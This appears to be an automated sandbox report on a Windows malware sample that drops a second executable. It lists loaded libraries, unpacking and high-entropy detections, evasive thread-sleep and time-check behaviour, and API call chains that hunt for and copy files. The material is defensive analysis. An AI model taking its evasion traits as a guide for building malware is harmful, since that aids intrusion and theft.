Source: C:\Users\user\Desktop\ief722WreR.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ief722WreR.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Desktop\ief722WreR.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\ief722WreR.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\Desktop\ief722WreR.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\ief722WreR.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\ief722WreR.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\ief722WreR.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ief722WreR.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ief722WreR.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\ief722WreR.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\ief722WreR.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ief722WreR.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\ief722WreR.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ief722WreR.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ief722WreR.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\ief722WreR.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\ief722WreR.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\ief722WreR.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ief722WreR.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ief722WreR.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\ief722WreR.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\ief722WreR.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\ief722WreR.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\ief722WreR.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\ief722WreR.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ief722WreR.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ief722WreR.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\ief722WreR.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\ief722WreR.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ief722WreR.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\ief722WreR.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ief722WreR.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\ief722WreR.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\ief722WreR.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\ief722WreR.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\ief722WreR.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\ief722WreR.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\ief722WreR.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\ief722WreR.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\ief722WreR.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\ief722WreR.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\ief722WreR.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\ief722WreR.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\ief722WreR.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\Desktop\ief722WreR.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\ief722WreR.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exe	Section loaded: netutils.dll	Jump to behavior

Source: C:\Users\user\Desktop\ief722WreR.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\ief722WreR.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exe

Unpacked PE file: 8.2.DADE.tmp.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\ief722WreR.exe	Unpacked PE file: 0.2.ief722WreR.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exe	Unpacked PE file: 8.2.DADE.tmp.exe.400000.0.unpack

Source: C:\Users\user\Desktop\ief722WreR.exe

Code function: 0_2_0041EC5E LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_0041EC5E

Source: C:\Users\user\Desktop\ief722WreR.exe	Code function: 0_2_00410766 push ecx; ret	0_2_00410779
Source: C:\Users\user\Desktop\ief722WreR.exe	Code function: 0_2_0040FD8C push ecx; ret	0_2_0040FD9F
Source: C:\Users\user\Desktop\ief722WreR.exe	Code function: 0_2_00AFF010 push ecx; ret	0_2_00AFF02D
Source: C:\Users\user\Desktop\ief722WreR.exe	Code function: 0_2_00AFC3E4 pushad ; ret	0_2_00AFC40C
Source: C:\Users\user\Desktop\ief722WreR.exe	Code function: 0_2_00AFC885 push 00000003h; ret	0_2_00AFC889
Source: C:\Users\user\Desktop\ief722WreR.exe	Code function: 0_2_00AFAADA push es; iretd	0_2_00AFAAEB
Source: C:\Users\user\Desktop\ief722WreR.exe	Code function: 0_2_00AFEE92 pushad ; ret	0_2_00AFEEAE
Source: C:\Users\user\Desktop\ief722WreR.exe	Code function: 0_2_024909CD push ecx; ret	0_2_024909E0
Source: C:\Users\user\Desktop\ief722WreR.exe	Code function: 0_2_024B799F push esp; retf	0_2_024B79A7
Source: C:\Users\user\Desktop\ief722WreR.exe	Code function: 0_2_0249CE18 push ss; retf	0_2_0249CE1D
Source: C:\Users\user\Desktop\ief722WreR.exe	Code function: 0_2_0248FFF3 push ecx; ret	0_2_02490006
Source: C:\Users\user\Desktop\ief722WreR.exe	Code function: 0_2_024B7F9D push esp; retf	0_2_024B7F9E
Source: C:\Users\user\Desktop\ief722WreR.exe	Code function: 0_2_024BDDDE push dword ptr [esp+ecx-75h]; iretd	0_2_024BDDE2
Source: C:\Users\user\Desktop\ief722WreR.exe	Code function: 0_2_024B9DE8 pushad ; retf	0_2_024B9DEF
Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exe	Code function: 8_2_009F7B2C push ecx; ret	8_2_009F7B3F
Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exe	Code function: 8_2_00A5DCFD push edx; iretd	8_2_00A5DD0E
Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exe	Code function: 8_2_00A5C2FF push B35707CFh; iretd	8_2_00A5C3F3
Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exe	Code function: 8_2_00A5C2FF pushad ; iretd	8_2_00A5C471
Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exe	Code function: 8_2_00A5EAFA pushad ; retf	8_2_00A5EAFB
Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exe	Code function: 8_2_00A5D206 push ebp; iretd	8_2_00A5D239
Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exe	Code function: 8_2_00A5B380 push 00000032h; retf	8_2_00A5B382
Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exe	Code function: 8_2_00A5C3F4 pushad ; iretd	8_2_00A5C471
Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exe	Code function: 8_2_00A5EB3C push ebx; iretd	8_2_00A5EB67
Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exe	Code function: 8_2_00A5A360 push ebx; ret	8_2_00A5A3C5

Source: ief722WreR.exe	Static PE information: section name: .text entropy: 7.553001973414483
Source: ScreenUpdateSync[1].exe.0.dr	Static PE information: section name: .text entropy: 7.107648496385774
Source: DADE.tmp.exe.0.dr	Static PE information: section name: .text entropy: 7.107648496385774

Source: C:\Users\user\Desktop\ief722WreR.exe	File created: C:\Users\user\AppData\Local\Temp\DADE.tmp.exe			Jump to dropped file
Source: C:\Users\user\Desktop\ief722WreR.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\ScreenUpdateSync[1].exe			Jump to dropped file

Source: C:\Users\user\Desktop\ief722WreR.exe

Code function: 0_2_0040E974 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_0040E974

Source: C:\Users\user\Desktop\ief722WreR.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\ief722WreR.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\ief722WreR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ief722WreR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ief722WreR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ief722WreR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ief722WreR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\Desktop\ief722WreR.exe	Window / User API: threadDelayed 2932			Jump to behavior
Source: C:\Users\user\Desktop\ief722WreR.exe	Window / User API: threadDelayed 7043			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exe	Evasive API call chain: GetSystemTime,DecisionNodes			graph_8-32722
Source: C:\Users\user\Desktop\ief722WreR.exe	Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes			graph_0-65497

Source: C:\Users\user\Desktop\ief722WreR.exe	API coverage: 5.1 %
Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exe	API coverage: 3.2 %

Source: C:\Users\user\Desktop\ief722WreR.exe TID: 996	Thread sleep count: 2932 > 30	Jump to behavior
Source: C:\Users\user\Desktop\ief722WreR.exe TID: 996	Thread sleep time: -2116904s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ief722WreR.exe TID: 996	Thread sleep count: 7043 > 30	Jump to behavior
Source: C:\Users\user\Desktop\ief722WreR.exe TID: 996	Thread sleep time: -5085046s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\ief722WreR.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\ief722WreR.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\ief722WreR.exe	Code function: 0_2_004389F2 FindFirstFileExW,	0_2_004389F2
Source: C:\Users\user\Desktop\ief722WreR.exe	Code function: 0_2_024B8C59 FindFirstFileExW,	0_2_024B8C59
Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exe	Code function: 8_2_009EE0B7 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy,	8_2_009EE0B7
Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exe	Code function: 8_2_009ED8A7 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose,	8_2_009ED8A7
Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exe	Code function: 8_2_009D1807 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,	8_2_009D1807
Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exe	Code function: 8_2_009E1827 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,	8_2_009E1827
Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exe	Code function: 8_2_009D1820 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,	8_2_009D1820
Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exe	Code function: 8_2_009EE597 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,	8_2_009EE597
Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exe	Code function: 8_2_009E5127 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,	8_2_009E5127
Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exe	Code function: 8_2_009E1EA7 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,	8_2_009E1EA7
Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exe	Code function: 8_2_009DDFD7 lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,	8_2_009DDFD7
Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exe	Code function: 8_2_009E3F27 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,	8_2_009E3F27
